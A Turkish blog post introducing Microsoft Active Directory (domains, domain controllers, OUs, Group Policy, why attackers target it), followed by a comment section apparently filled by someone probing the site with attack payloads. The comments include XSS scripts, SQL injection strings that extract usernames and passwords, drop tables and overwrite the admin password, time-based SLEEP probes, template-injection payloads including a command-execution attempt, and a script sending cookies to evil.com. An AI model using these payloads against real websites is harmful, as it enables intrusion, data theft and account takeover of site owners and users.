.png)
Active Directory Nedir? Kurumsal Ağların Gizli Kahramanı
Günümüzde kurumsal ağlarda kullanıcıları, bilgisayarları ve kaynakları merkezi bir şekilde yönetmek büyük önem taşır. Bu ihtiyacı karşılayan en yaygın sistemlerden biri Microsoft Active Directory (AD)’dir. Peki Active Directory tam olarak nedir ve neden bu kadar önemlidir?
Active Directory Nedir?
Active Directory, Microsoft tarafından geliştirilen ve Windows Server sistemlerinde çalışan bir dizin hizmetidir (directory service). Temel görevi; ağdaki kullanıcılar, bilgisayarlar, yazıcılar, paylaşımlar, güvenlik ilkeleri ve daha fazlasını merkezi bir yapıda yönetmektir.
Basitçe söylemek gerekirse:
Active Directory = Kurum içi dijital kimlik yöneticisi + kaynak kontrol merkezi
Temel Bileşenleri
1. Domain (Etki Alanı)
Kurumsal ağın yönetildiği temel yapıdır. Örneğin kurum.local gibi bir domain altında tüm kullanıcılar ve sistemler bulunur.
2. Domain Controller (Etki Alanı Denetleyicisi)
Active Directory hizmetini çalıştıran sunucudur. Kullanıcı doğrulama (login), grup ilkeleri, izinler gibi tüm işlemler buradan yönetilir.
3. Organizational Unit (OU)
Kullanıcıları, grupları ve bilgisayarları mantıksal olarak gruplamak için kullanılır. Örneğin: İnsan Kaynakları OU'su, BT OU'su vb.
4. Group Policy (Grup İlkesi)
Kullanıcı ve bilgisayarların davranışlarını merkezi olarak belirleyen ayarlardır. Örnek: Masaüstü arka planını sabitlemek, USB kullanımını engellemek.
Neler Yapabilirsiniz?
Active Directory ile şunlar mümkündür:
-
Kullanıcı hesapları oluşturmak ve yetkilendirmek
-
Şifre politikalarını belirlemek
-
Giriş (login) denetimi ve kimlik doğrulama
-
Dosya ve klasör paylaşım izinleri
-
Yazılım ve güncelleme dağıtımı
-
Tüm ağı merkezi olarak izlemek ve yönetmek
Güvenlik Açısından Önemi
Active Directory, siber saldırganlar için en değerli hedeflerden biridir. Çünkü:
-
Domain Admin hesabı ele geçirilirse tüm ağ kontrol edilebilir
-
Zayıf şifreler, yanlış grup yetkileri ciddi risk oluşturur
-
LDAP ve Kerberos gibi protokoller üzerinden yapılan saldırılar (örneğin Pass-the-Hash, Golden Ticket) AD’yi hedef alır
Bu yüzden AD yapısının doğru planlanması ve güvenlik açısından sertleştirilmesi çok önemlidir.
Kimler Kullanıyor?
Active Directory, dünya genelinde birçok devlet kurumu, banka, üniversite, özel şirket ve hastane gibi kurumsal yapılarda yaygın olarak kullanılmaktadır.
Çünkü:
✅ Kullanıcı yönetimi kolaydır
✅ Güvenlik politikaları merkezden uygulanabilir
✅ BT operasyonlarını basitleştirir ve hızlandırır
Sonuç
Active Directory, bir kurumun dijital kimlik ve kaynak yönetiminin omurgasını oluşturur. Etkili ve güvenli bir AD altyapısı, sadece BT ekibi için değil, tüm organizasyon için kritik öneme sahiptir.
Bu nedenle bir sistem yöneticisi ya da siber güvenlik uzmanı olarak AD’yi iyi tanımak, yapılandırmak ve korumak büyük bir sorumluluktur.
Yorumlar
sa
ssa
selam yakışıklı
Test <img src=x onerror=alert(1)>
Test' OR '1'='1
Test'--
Test'; DROP TABLE users--
Test' UNION SELECT * FROM users--
<script>alert(1)</script>
{{7*7}}
<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
Test'); DROP TABLE blogs;-- -
Test', (SELECT password FROM admin LIMIT 1))-- -
Test' + (SELECT @@version) + '
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
@(7*7)
{{config}}
{{self.__class__.__mro__}}
${T(java.lang.Runtime).getRuntime().exec('id')}
{{''.__class__.__mro__[1].__subclasses__()}}
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="https://attacker.com/x.jpg"/> </svg>
Test'); INSERT INTO users(username,password) VALUES('hacker','hacked');--
Test' UNION SELECT username,password FROM users--
Test'; UPDATE users SET password='hacked' WHERE username='admin';--
<script>new Image().src='http://evil.com/steal?c='+document.cookie</script>
Test' AND (SELECT SLEEP(5))--
Test'||(SELECT CASE WHEN (1=1) THEN 'a' ELSE 'b' END)||'
Test content SQLi in name - OR bypass
Test content Comment out rest
Test content UNION 5 cols
Test content UNION 10 cols
Test content UNION NULL
Test content Extract admin
Test content Extract TR admin
Test content Extract adminler
Test content List tables
Test content List columns
Test content Stacked insert
Test content Extract version
Test content Error-based
Test
QuoteTest
Time payload 0
Time payload 1
Time payload 2
Time payload 3
Time payload 4
OOB Test
OOB Test
OOB Test
Error extraction
Error extraction
Error extraction
ResponseTest123
Time test SLEEP no quote
Time test SLEEP with quote
Time test SLEEP with comment
Time test Stacked SLEEP
Retry Normal
Retry Normal 2
Retry SLEEP(5)
Retry Normal 3
test
test
test
test
test
test
'
"
1 OR 1=1
1' OR '1'='1
1; SELECT 1
1 UNION SELECT 1
test
1' AND SLEEP(3)-- -
test
test
test
test
test
test
test
test
test
test
test
Onaylı yorum testi - EXPLOIT123
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
SQLi Test
Error SQLi
Error SQLi
Error SQLi
Error SQLi